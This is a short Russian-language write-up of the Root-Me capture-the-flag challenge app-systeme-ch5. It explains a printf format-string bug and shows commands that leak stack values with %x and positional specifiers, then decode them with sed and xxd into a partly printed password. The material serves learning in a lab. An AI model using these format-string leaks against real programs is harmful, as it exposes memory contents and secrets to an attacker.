ssh -p 2222 app-systeme-ch5@challenge02.root-me.org 


Баг форматной строки

Функция printf в общем случае принимает строку формата, а не просто данные

printf("text_string %s, %p, %d", str, ptr, digit)

где str ptr digit берутся со стека

Поэтому если функции подать на ввод аргументы, она будет читать их со стека

Пример:
app-systeme-ch5@challenge02:~$ ./ch5 '%08x %08x %08x'
00000020 0804b160 0804853d

Мы читаем 3 8 байтных значения которые лежат на адресах выше первого аргумента printf 

Мы знаем что функция кладет значения прочитанные в fopen на стек, значит нам надо проанализировать стек и найти строку



app-systeme-ch5@challenge02:~$ for i in {10..15}; do ./ch5 "%$i"'$08x'; echo; done
0804b160
39617044
28293664
6d617045
bf000a64
0804861b




пишем цикл который проходит по значениям со стека, на позициях 11-13 видим значения не похожие на адреса, проверим ...


app-systeme-ch5@challenge02:~$ ./ch5 '%11$x%12$x%13$x' | sed -r 's/(..)(..)(..)(..)/\4\3\2\1/g' | xxd -r -p

sed принимает строку и разбивает на группы по 2, которые мы переставляем в be порядок, xxd -r -p берет hex и приводит к байтам, в нашем случае ASCII

Dpa9d6)(Epamapp-systeme-ch5@challenge02:~$

strings < <(for i in `seq 1 2 20`; do ./ch5 "%$i"'$08X'"%$((i+1))"'$08X' |sed -r 's/(..)(..)(..)(..)/\4\3\2\1/g' |xxd -r -p; echo; done)
